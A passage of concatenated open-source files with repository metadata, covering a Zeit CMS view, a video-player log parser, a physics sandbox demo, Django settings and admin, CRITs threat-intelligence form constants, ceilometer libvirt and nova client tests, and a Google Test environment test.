zeit.cms.repository.interfaces.ObjectReloadedEvent(self.context))
self.redirect(self.url(self.context, '@@view.html'))
return ''
class MenuItem(zeit.cms.browser.menu.ActionMenuItem):
"""Delete menu item."""
title = _('Reload folder')
|
{
"content_hash": "63ed79ff73f73e823da3954736b26156",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 77,
"avg_line_length": 29.44,
"alnum_prop": 0.686141304347826,
"repo_name": "ZeitOnline/zeit.cms",
"id": "b68553158e9ccd5e1d36a9d60f09cc130d9b9055",
"size": "736",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/zeit/cms/repository/browser/reload.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "45467"
},
{
"name": "HTML",
"bytes": "10561"
},
{
"name": "JavaScript",
"bytes": "152481"
},
{
"name": "Python",
"bytes": "920274"
},
{
"name": "Shell",
"bytes": "374"
}
],
"symlink_target": ""
}
|
import re
re_begin = re.compile('download begin \\d+')
re_end = re.compile('Loading complete\\. .+ sec \\d+ bytes')
re_buffer = re.compile('buffer = .+, bufferTime = .+')
re_play_quality = re.compile('swicth to index \\d')  # "swicth" [sic] matches the player's misspelled log line
re_quality = re.compile('quality=\\d+')
re_bw = re.compile('Bandwidth .+ kbps')
re_newone = re.compile("(\\{\\{\\{\\{\\{\\}\\}\\}\\}\\})|(QoSInfo)|(Ideal bitrate)|(=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=)")
def parse(s, add_bw_metric=False):
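    """Dispatch one raw player log line to the matching parser.

    The returned list starts with a message-type code: 1 = download
    begin/end, 2 = buffer state, 3 = playback quality switch, 4 = f4f
    handler quality, 5 = bandwidth (only when add_bw_metric is set).
    Lines matching re_newone are recognised but ignored (returns None).
    """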
if re_begin.search(s):
return begin_parse(re_begin.search(s).group(0))
elif re_end.search(s):
return end_parse(re_end.search(s).group(0))
elif re_buffer.search(s):
return buffer_parse(re_buffer.search(s).group(0))
elif re_play_quality.search(s):
return switch_parse(re_play_quality.search(s).group(0))
elif re_quality.search(s):
return f4fhandler_parse(re_quality.search(s).group(0))
elif add_bw_metric and re_bw.search(s):
return bw_parse(re_bw.search(s).group(0))
elif re_newone.search(s):
pass
else:
print s
        raise ValueError('invalid message format')
def begin_parse(s):
bitrate = int(s.replace('download begin ', ''))
result = {
0: 0,
1: 1,
2: 2,
3: 3,
4: 4
}[bitrate]
return [1, 0, result, 0]
def end_parse(s):
re_ = re.compile('Loading complete\\. .+ sec')
if re_.search(s):
        # when building the replace string, use the literal text (drop the regex escaping)
time = float(re_.search(s).group(0).replace('Loading complete. ', '')\
.replace(' sec', ''))
else:
        raise ValueError('invalid downloading completed')
re__ = re.compile('sec \\d+ bytes')
if re__.search(s):
size = float(re__.search(s).group(0).replace('sec ', '')\
.replace(' bytes', ''))
else:
        raise ValueError('invalid downloading size')
if time == 0:
time_ = time + 0.0005
flag = 1
else:
time_ = time
flag = 0
throughput = size/time_/1024
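    # time_ and flag guard the zero-duration case; throughput (KiB/s) is
    # computed here but only the raw (time, size) pair is returned below.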
return [1, 1, time, size]
def buffer_parse(s):
s = s.split(',')
buffer_ = float(s[0].replace('buffer = ', ''))
buffer_time = float(s[1].replace('bufferTime = ', ''))
return [2, buffer_, buffer_time]
def switch_parse(s):
index = int(s.replace('swicth to index ', ''))
return [3, index]
def f4fhandler_parse(s):
index = int(s.replace('quality=', ''))
return [4, index]
def bw_parse(s):
bw = float(s.replace('Bandwidth ', '').replace(' kbps', ''))
return [5, bw]
if __name__ == "__main__":
print parse('download begin 0')
print parse('download begin 2')
print parse('Loading complete. 0.001 sec 458792 bytes.')
print parse('Loading complete. 0.013 sec 418063 bytes.')
print parse('buffer = 5.114, bufferTime = 4')
print parse('swicth to index 2')
print parse('Bandwidth 2421 kbps', True)
print parse('Bandwidth 3882.211 kbps', True)
print parse('[[[[[]]]]] size = 252554')
|
{
"content_hash": "2f1b2fef1098967f82ee57c663391b2e",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 164,
"avg_line_length": 31.357894736842105,
"alnum_prop": 0.5545485062101376,
"repo_name": "divergentdave/OSMF-log-parser",
"id": "2327f1f1cc304bd8629c8d313428abcc566718c8",
"size": "2979",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "msg_parser.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5225"
}
],
"symlink_target": ""
}
|
"""
A simple example that shows how shapes initially placed overlapping will
try to move so they are not overlapping. In this case we put too many
balls into a very small area and let them find their way out.
Note that we need to shift placement of the balls around a small area to
get uniform expansion when the simulation starts. Putting them all on the
exact same spot expands them only in a horizontal line.
The screencast developing this code can be found here:
http://youtu.be/F8qSSoBz_o8?hd=1
"""
from pyphysicssandbox import *
import random
window("A tiny volcano", 400, 400)
static_line((225, 400), (175, 400), 15).color=Color('grey')
static_line((225, 400), (225, 300), 15).color=Color('grey')
static_line((175, 300), (175, 400), 15).color=Color('grey')
static_line((220, 275), (225, 300), 15).color=Color('grey')
static_line((175, 300), (180, 275), 15).color=Color('grey')
# We have to spread the balls out a bit to get uniform expansion,
# otherwise they all expand horizontally.
for i in range(500):
ball1 = ball((200+random.randint(-1,1), 350+random.randint(-1,1)), 5)
#ball1.color = Color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
ball1.color = Color('red')
run()
|
{
"content_hash": "446515a30b27590dcbbe4ca7ff58c824",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 96,
"avg_line_length": 36.23529411764706,
"alnum_prop": 0.7142857142857143,
"repo_name": "jshaffstall/PyPhysicsSandbox",
"id": "c307eebe3e6736e9d7c32f1c4606f99a111c4ef9",
"size": "1232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/volcano.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "133098"
}
],
"symlink_target": ""
}
|
"""
Django settings for brumed project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xs(1zpba3%vmm)re6z@i(v$c66rs4_r7m3*4@lu30zyq!=)ts@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'brumed.urls'
WSGI_APPLICATION = 'brumed.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
|
{
"content_hash": "72330e1a7d571631b6b9d29680c64e82",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 71,
"avg_line_length": 24.602409638554217,
"alnum_prop": 0.7257590597453477,
"repo_name": "josecostamartins/pythonreges",
"id": "22131003f46449b5c65492d37fba3847776f086e",
"size": "2042",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "brumed/brumed/brumed/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "671"
},
{
"name": "Python",
"bytes": "32164"
}
],
"symlink_target": ""
}
|
"""Implementation of Inspector abstraction for libvirt."""
from lxml import etree
from oslo.config import cfg
from ceilometer.compute.virt import inspector as virt_inspector
from ceilometer.openstack.common import log as logging
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
class LibvirtInspector(virt_inspector.Inspector):
per_type_uris = dict(uml='uml:///system', xen='xen:///', lxc='lxc:///')
def __init__(self):
self.uri = self._get_uri()
self.connection = None
def _get_uri(self):
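        # An explicit libvirt_uri always wins; otherwise the configured
        # libvirt_type is mapped to a URI, falling back to 'qemu:///system'
        # (which covers the kvm and qemu types).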
return CONF.libvirt_uri or self.per_type_uris.get(CONF.libvirt_type,
'qemu:///system')
def _get_connection(self):
if not self.connection or not self._test_connection():
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
LOG.debug('Connecting to libvirt: %s', self.uri)
self.connection = libvirt.openReadOnly(self.uri)
return self.connection
def _test_connection(self):
try:
self.connection.getCapabilities()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() == libvirt.VIR_ERR_SYSTEM_ERROR and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
def _lookup_by_name(self, instance_name):
try:
return self._get_connection().lookupByName(instance_name)
except Exception as ex:
error_code = ex.get_error_code() if libvirt else 'unknown'
msg = ("Error from libvirt while looking up %(instance_name)s: "
"[Error Code %(error_code)s] %(ex)s" % locals())
raise virt_inspector.InstanceNotFoundException(msg)
def inspect_instances(self):
if self._get_connection().numOfDomains() > 0:
for domain_id in self._get_connection().listDomainsID():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._get_connection().lookupByID(domain_id)
yield virt_inspector.Instance(name=domain.name(),
uuid=domain.UUIDString())
except libvirt.libvirtError:
# Instance was deleted while listing... ignore it
pass
def inspect_cpus(self, instance_name):
domain = self._lookup_by_name(instance_name)
(_, _, _, num_cpu, cpu_time) = domain.info()
return virt_inspector.CPUStats(number=num_cpu, time=cpu_time)
def inspect_vnics(self, instance_name):
domain = self._lookup_by_name(instance_name)
tree = etree.fromstring(domain.XMLDesc(0))
for iface in tree.findall('devices/interface'):
name = iface.find('target').get('dev')
mac = iface.find('mac').get('address')
fref = iface.find('filterref').get('filter')
params = dict((p.get('name').lower(), p.get('value'))
for p in iface.findall('filterref/parameter'))
interface = virt_inspector.Interface(name=name, mac=mac,
fref=fref, parameters=params)
rx_bytes, rx_packets, _, _, \
tx_bytes, tx_packets, _, _ = domain.interfaceStats(name)
stats = virt_inspector.InterfaceStats(rx_bytes=rx_bytes,
rx_packets=rx_packets,
tx_bytes=tx_bytes,
tx_packets=tx_packets)
yield (interface, stats)
def inspect_disks(self, instance_name):
domain = self._lookup_by_name(instance_name)
tree = etree.fromstring(domain.XMLDesc(0))
for device in filter(
bool,
[target.get("dev")
for target in tree.findall('devices/disk/target')]):
disk = virt_inspector.Disk(device=device)
block_stats = domain.blockStats(device)
stats = virt_inspector.DiskStats(read_requests=block_stats[0],
read_bytes=block_stats[1],
write_requests=block_stats[2],
write_bytes=block_stats[3],
errors=block_stats[4])
yield (disk, stats)
|
{
"content_hash": "8d8d8d5f421f8379ac9fca7b51038465",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 79,
"avg_line_length": 41.6910569105691,
"alnum_prop": 0.5273010920436817,
"repo_name": "dreamhost/ceilometer",
"id": "f5881659b93268d7c511e48f9f4c09b46d878968",
"size": "5781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceilometer/compute/virt/libvirt/inspector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "368517"
},
{
"name": "Python",
"bytes": "993129"
}
],
"symlink_target": ""
}
|
class Common():
ADD_INDICATOR = "Add Indicator?"
BUCKET_LIST = "Bucket List"
CAMPAIGN = "Campaign"
CAMPAIGN_CONFIDENCE = "Campaign Confidence"
OBJECTS_DATA = "Objects Data"
SOURCE = "Source"
SOURCE_REFERENCE = "Source Reference"
SOURCE_METHOD = "Source Method"
TICKET = "Ticket"
CLASS_ATTRIBUTE = "class"
BULK_SKIP = "bulkskip"
BULK_REQUIRED = "bulkrequired"
# class names
Actor = "Actor"
Backdoor = "Backdoor"
Campaign = "Campaign"
Certificate = "Certificate"
Domain = "Domain"
Email = "Email"
Event = "Event"
Exploit = "Exploit"
Indicator = "Indicator"
IP = "IP"
Object = "Object"
PCAP = "PCAP"
RawData = "RawData"
Sample = "Sample"
Target = "Target"
BUCKET_LIST_VARIABLE_NAME = "bucket_list"
TICKET_VARIABLE_NAME = "ticket"
class Status():
"""
Status fields/enumerations used in bulk upload.
"""
    STATUS_FIELD = "status"
    FAILURE = 0
    SUCCESS = 1
    DUPLICATE = 2
class Actor():
"""
Constants for Actors.
"""
NAME = "Name"
ALIASES = "Aliases"
DESCRIPTION = "Description"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
SOURCE = Common.SOURCE
SOURCE_METHOD = "Source Method"
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Backdoor():
"""
Constants for Backdoors.
"""
NAME = "Backdoor name"
ALIASES = "Aliases"
DESCRIPTION = "Description"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
VERSION = "Version"
SOURCE = Common.SOURCE
SOURCE_METHOD = "Source Method"
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Exploit():
"""
Constants for Exploits.
"""
NAME = "Name"
DESCRIPTION = "Description"
CVE = "CVE"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
VERSION = "Version"
SOURCE = Common.SOURCE
SOURCE_METHOD = "Source Method"
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Campaign():
"""
Constants for Campaigns.
"""
NAME = "Name"
class Certificate():
"""
Constants for Certificates.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class IP():
"""
Constants for IPs.
"""
IP_ADDRESS = "IP Address"
IP_TYPE = "IP Type"
ANALYST = "Analyst"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
ADD_INDICATOR = Common.ADD_INDICATOR
INDICATOR_REFERENCE = "Indicator Reference"
IP_DATE = "IP Date"
IP_SOURCE = "IP Source"
IP_METHOD = "IP Source Method"
IP_REFERENCE = "IP Source Reference"
CACHED_RESULTS = "ip_cached_results"
class Domain():
"""
Constants for Domains.
"""
DOMAIN_NAME = "Domain Name"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
DOMAIN_SOURCE = Common.SOURCE
DOMAIN_METHOD = Common.SOURCE_METHOD
DOMAIN_REFERENCE = Common.SOURCE_REFERENCE
ADD_IP_ADDRESS = "Add IP Address?"
IP_ADDRESS = IP.IP_ADDRESS
IP_TYPE = IP.IP_TYPE
IP_DATE = IP.IP_DATE
SAME_SOURCE = "Use Domain Source"
IP_SOURCE = IP.IP_SOURCE
IP_METHOD = IP.IP_METHOD
IP_REFERENCE = IP.IP_REFERENCE
ADD_INDICATORS = "Add Indicator(s)?"
CACHED_RESULTS = "domain_cached_results"
class Email():
"""
Constants for Emails.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Event():
"""
Constants for Events.
"""
TITLE = "Title"
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Indicator():
"""
Constants for Indicators.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class NotificationType():
ALERT = 'alert'
ERROR = 'error'
INFORMATION = 'information'
NOTIFICATION = 'notification'
SUCCESS = 'success'
WARNING = 'warning'
ALL = [ALERT, ERROR, INFORMATION, NOTIFICATION, SUCCESS, WARNING]
class Object():
"""
Constants for Objects.
"""
OBJECT_TYPE_INDEX = 0
VALUE_INDEX = 1
SOURCE_INDEX = 2
METHOD_INDEX = 3
REFERENCE_INDEX = 4
ADD_INDICATOR_INDEX = 5
OBJECT_TYPE = "Object Type"
VALUE = "Value"
SOURCE = Common.SOURCE
METHOD = "Method"
REFERENCE = "Reference"
PARENT_OBJECT_TYPE = "Otype"
PARENT_OBJECT_ID = "Oid"
ADD_INDICATOR = Common.ADD_INDICATOR
class PCAP():
"""
Constants for PCAPs.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class RawData():
"""
Constants for RawData.
"""
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
class Sample():
"""
Constants for Samples.
"""
BUCKET_LIST = Common.BUCKET_LIST
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
EMAIL_RESULTS = "Email Me Results"
FILE_DATA = "File Data"
FILE_FORMAT = "File Format"
FILE_NAME = "File Name"
INHERIT_CAMPAIGNS = "Inherit Campaigns?"
INHERIT_SOURCES = "Inherit Sources?"
MD5 = "MD5"
RELATED_MD5 = "Related MD5"
PASSWORD = "Password"
SOURCE = Common.SOURCE
SOURCE_METHOD = Common.SOURCE_METHOD
SOURCE_REFERENCE = Common.SOURCE_REFERENCE
UPLOAD_TYPE = "Upload Type"
CACHED_RESULTS = "sample_cached_results"
class UploadType():
FILE_UPLOAD = "File Upload"
METADATA_UPLOAD = "Metadata Upload"
class Target():
"""
Constants for Targets.
"""
TITLE = "Title"
CAMPAIGN = Common.CAMPAIGN
CAMPAIGN_CONFIDENCE = Common.CAMPAIGN_CONFIDENCE
def get_source_field_for_class(otype):
"""
Based on the CRITs type, get the source field constant.
:param otype: The CRITs type.
:type otype: str.
:returns: str
"""
class_to_source_field_map = {
Common.Certificate: Certificate.SOURCE,
Common.Domain: Domain.DOMAIN_SOURCE,
Common.Email: Email.SOURCE,
Common.Event: Event.SOURCE,
Common.Indicator: Indicator.SOURCE,
Common.IP: IP.SOURCE,
Common.Object: Object.SOURCE,
Common.PCAP: PCAP.SOURCE,
Common.RawData: RawData.SOURCE,
Common.Sample: Sample.SOURCE
}
return class_to_source_field_map.get(otype)
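# Usage sketch:
#   get_source_field_for_class(Common.Domain)    # -> Domain.DOMAIN_SOURCE ("Source")
#   get_source_field_for_class("UnmappedType")   # -> None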
|
{
"content_hash": "ff09cff3acc19722d024720770a2a19f",
"timestamp": "",
"source": "github",
"line_count": 304,
"max_line_length": 69,
"avg_line_length": 22.223684210526315,
"alnum_prop": 0.6358792184724689,
"repo_name": "blaquee/crits",
"id": "5a3c51c49e1421a5662c106c5e1b885c5672bb21",
"size": "6756",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "crits/core/form_consts.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "8694"
},
{
"name": "CSS",
"bytes": "391710"
},
{
"name": "HTML",
"bytes": "456073"
},
{
"name": "JavaScript",
"bytes": "3486649"
},
{
"name": "Python",
"bytes": "1863769"
},
{
"name": "SaltStack",
"bytes": "2981"
},
{
"name": "Shell",
"bytes": "10871"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from notifications.models import Notification
from notifications.models import NotificationPreference
from notifications.models import NotificationType
class NotificationAdmin(admin.ModelAdmin):
list_display = ('actor', 'type', 'recipient', 'seen')
class NotificationPreferenceAdmin(admin.ModelAdmin):
list_display = ('user', 'notification_type', 'subscription_status')
class NotificationTypeAdmin(admin.ModelAdmin):
list_display = ('name', 'label')
admin.site.register(Notification, NotificationAdmin)
admin.site.register(NotificationPreference, NotificationPreferenceAdmin)
admin.site.register(NotificationType, NotificationTypeAdmin)
|
{
"content_hash": "a747d3d4d6fe641709ff746447639488",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 72,
"avg_line_length": 32.857142857142854,
"alnum_prop": 0.808695652173913,
"repo_name": "linkfloyd/linkfloyd",
"id": "ab112de1761cd20f70c292c6ec6da4345bea69c6",
"size": "690",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "linkfloyd/notifications/admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27118"
},
{
"name": "JavaScript",
"bytes": "60925"
},
{
"name": "Python",
"bytes": "234160"
}
],
"symlink_target": ""
}
|
import mock
import novaclient
from ceilometer.tests import base
from ceilometer import nova_client
class TestNovaClient(base.TestCase):
def setUp(self):
super(TestNovaClient, self).setUp()
self.nv = nova_client.Client()
self.stubs.Set(self.nv.nova_client.flavors, 'get',
self.fake_flavors_get)
self.stubs.Set(self.nv.nova_client.images, 'get', self.fake_images_get)
@staticmethod
def fake_flavors_get(*args, **kwargs):
a = mock.MagicMock()
a.id = args[0]
if a.id == 1:
a.name = 'm1.tiny'
elif a.id == 2:
a.name = 'm1.large'
else:
raise novaclient.exceptions.NotFound('foobar')
return a
@staticmethod
def fake_images_get(*args, **kwargs):
a = mock.MagicMock()
a.id = args[0]
image_details = {
1: ('ubuntu-12.04-x86', dict(kernel_id=11, ramdisk_id=21)),
2: ('centos-5.4-x64', dict(kernel_id=12, ramdisk_id=22)),
3: ('rhel-6-x64', None),
4: ('rhel-6-x64', dict()),
5: ('rhel-6-x64', dict(kernel_id=11)),
6: ('rhel-6-x64', dict(ramdisk_id=21))
}
if a.id in image_details:
a.name = image_details[a.id][0]
a.metadata = image_details[a.id][1]
else:
raise novaclient.exceptions.NotFound('foobar')
return a
@staticmethod
def fake_flavors_list():
a = mock.MagicMock()
a.id = 1
a.name = 'm1.tiny'
b = mock.MagicMock()
b.id = 2
b.name = 'm1.large'
return [a, b]
@staticmethod
def fake_servers_list(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 1}
a.image = {'id': 1}
return [a]
def test_instance_get_all_by_host(self):
self.stubs.Set(self.nv.nova_client.servers, 'list',
self.fake_servers_list)
instances = self.nv.instance_get_all_by_host('foobar')
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0].flavor['name'], 'm1.tiny')
self.assertEqual(instances[0].image['name'], 'ubuntu-12.04-x86')
self.assertEqual(instances[0].kernel_id, 11)
self.assertEqual(instances[0].ramdisk_id, 21)
@staticmethod
def fake_servers_list_unknown_flavor(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 666}
a.image = {'id': 1}
return [a]
def test_instance_get_all_by_host_unknown_flavor(self):
self.stubs.Set(self.nv.nova_client.servers, 'list',
self.fake_servers_list_unknown_flavor)
instances = self.nv.instance_get_all_by_host('foobar')
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0].flavor['name'], 'unknown-id-666')
@staticmethod
def fake_servers_list_unknown_image(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 1}
a.image = {'id': 666}
return [a]
@staticmethod
def fake_servers_list_image_missing_metadata(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 1}
a.image = {'id': args[0]}
return [a]
@staticmethod
def fake_instance_image_missing(*args, **kwargs):
a = mock.MagicMock()
a.id = 42
a.flavor = {'id': 666}
a.image = None
return [a]
def test_instance_get_all_by_host_unknown_image(self):
self.stubs.Set(self.nv.nova_client.servers, 'list',
self.fake_servers_list_unknown_image)
instances = self.nv.instance_get_all_by_host('foobar')
self.assertEqual(len(instances), 1)
self.assertEqual(instances[0].image['name'], 'unknown-id-666')
def test_with_flavor_and_image(self):
results = self.nv._with_flavor_and_image(self.fake_servers_list())
instance = results[0]
self.assertEqual(instance.image['name'], 'ubuntu-12.04-x86')
self.assertEqual(instance.flavor['name'], 'm1.tiny')
self.assertEqual(instance.kernel_id, 11)
self.assertEqual(instance.ramdisk_id, 21)
def test_with_flavor_and_image_unknown_image(self):
instances = self.fake_servers_list_unknown_image()
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertEqual(instance.image['name'], 'unknown-id-666')
self.assertNotEqual(instance.flavor['name'], 'unknown-id-666')
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_unknown_flavor(self):
instances = self.fake_servers_list_unknown_flavor()
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertEqual(instance.flavor['name'], 'unknown-id-666')
self.assertEqual(instance.flavor['vcpus'], 0)
self.assertEqual(instance.flavor['ram'], 0)
self.assertEqual(instance.flavor['disk'], 0)
self.assertNotEqual(instance.image['name'], 'unknown-id-666')
self.assertEqual(instance.kernel_id, 11)
self.assertEqual(instance.ramdisk_id, 21)
def test_with_flavor_and_image_none_metadata(self):
instances = self.fake_servers_list_image_missing_metadata(3)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_missing_metadata(self):
instances = self.fake_servers_list_image_missing_metadata(4)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_missing_ramdisk(self):
instances = self.fake_servers_list_image_missing_metadata(5)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertEqual(instance.kernel_id, 11)
self.assertIsNone(instance.ramdisk_id)
def test_with_flavor_and_image_missing_kernel(self):
instances = self.fake_servers_list_image_missing_metadata(6)
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertEqual(instance.ramdisk_id, 21)
def test_with_missing_image_instance(self):
instances = self.fake_instance_image_missing()
results = self.nv._with_flavor_and_image(instances)
instance = results[0]
self.assertIsNone(instance.kernel_id)
self.assertIsNone(instance.image)
self.assertIsNone(instance.ramdisk_id)
|
{
"content_hash": "b4711a5cb725ed8dab0c56e4929e497f",
"timestamp": "",
"source": "github",
"line_count": 190,
"max_line_length": 79,
"avg_line_length": 36.15263157894737,
"alnum_prop": 0.6040180521182122,
"repo_name": "JioCloud/ceilometer",
"id": "a51c0c36eb093f877b27ed1ec603a9a18349e757",
"size": "7568",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_novaclient.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "6284"
},
{
"name": "JavaScript",
"bytes": "64962"
},
{
"name": "Python",
"bytes": "1805677"
},
{
"name": "Shell",
"bytes": "1322"
}
],
"symlink_target": ""
}
|
"""Unit test for Google Test's global test environment behavior.
A user can specify a global test environment via
testing::AddGlobalTestEnvironment. Failures in the global environment should
result in all unit tests being skipped.
This script tests such functionality by invoking
googletest-global-environment-unittest_ (a program written with Google Test).
"""
import re
from googletest.test import gtest_test_utils
def RunAndReturnOutput(args=None):
"""Runs the test program and returns its output."""
return gtest_test_utils.Subprocess([
gtest_test_utils.GetTestExecutablePath(
'googletest-global-environment-unittest_')
] + (args or [])).output
class GTestGlobalEnvironmentUnitTest(gtest_test_utils.TestCase):
"""Tests global test environment failures."""
def testEnvironmentSetUpFails(self):
"""Tests the behavior of not specifying the fail_fast."""
# Run the test.
txt = RunAndReturnOutput()
# We should see the text of the global environment setup error.
self.assertIn('Canned environment setup error', txt)
# Our test should have been skipped due to the error, and not treated as a
# pass.
self.assertIn('[ SKIPPED ] 1 test', txt)
self.assertIn('[ PASSED ] 0 tests', txt)
# The test case shouldn't have been run.
self.assertNotIn('Unexpected call', txt)
def testEnvironmentSetUpAndTornDownForEachRepeat(self):
"""Tests the behavior of test environments and gtest_repeat."""
# When --gtest_recreate_environments_when_repeating is true, the global test
# environment should be set up and torn down for each iteration.
txt = RunAndReturnOutput([
'--gtest_repeat=2',
'--gtest_recreate_environments_when_repeating=true',
])
expected_pattern = ('(.|\n)*'
r'Repeating all tests \(iteration 1\)'
'(.|\n)*'
'Global test environment set-up.'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
'Global test environment tear-down'
'(.|\n)*'
r'Repeating all tests \(iteration 2\)'
'(.|\n)*'
'Global test environment set-up.'
'(.|\n)*'
'SomeTest.DoesFoo'
'(.|\n)*'
'Global test environment tear-down'
'(.|\n)*')
self.assertRegex(txt, expected_pattern)
def testEnvironmentSetUpAndTornDownOnce(self):
"""Tests environment and --gtest_recreate_environments_when_repeating."""
# By default the environment should only be set up and torn down once, at
# the start and end of the test respectively.
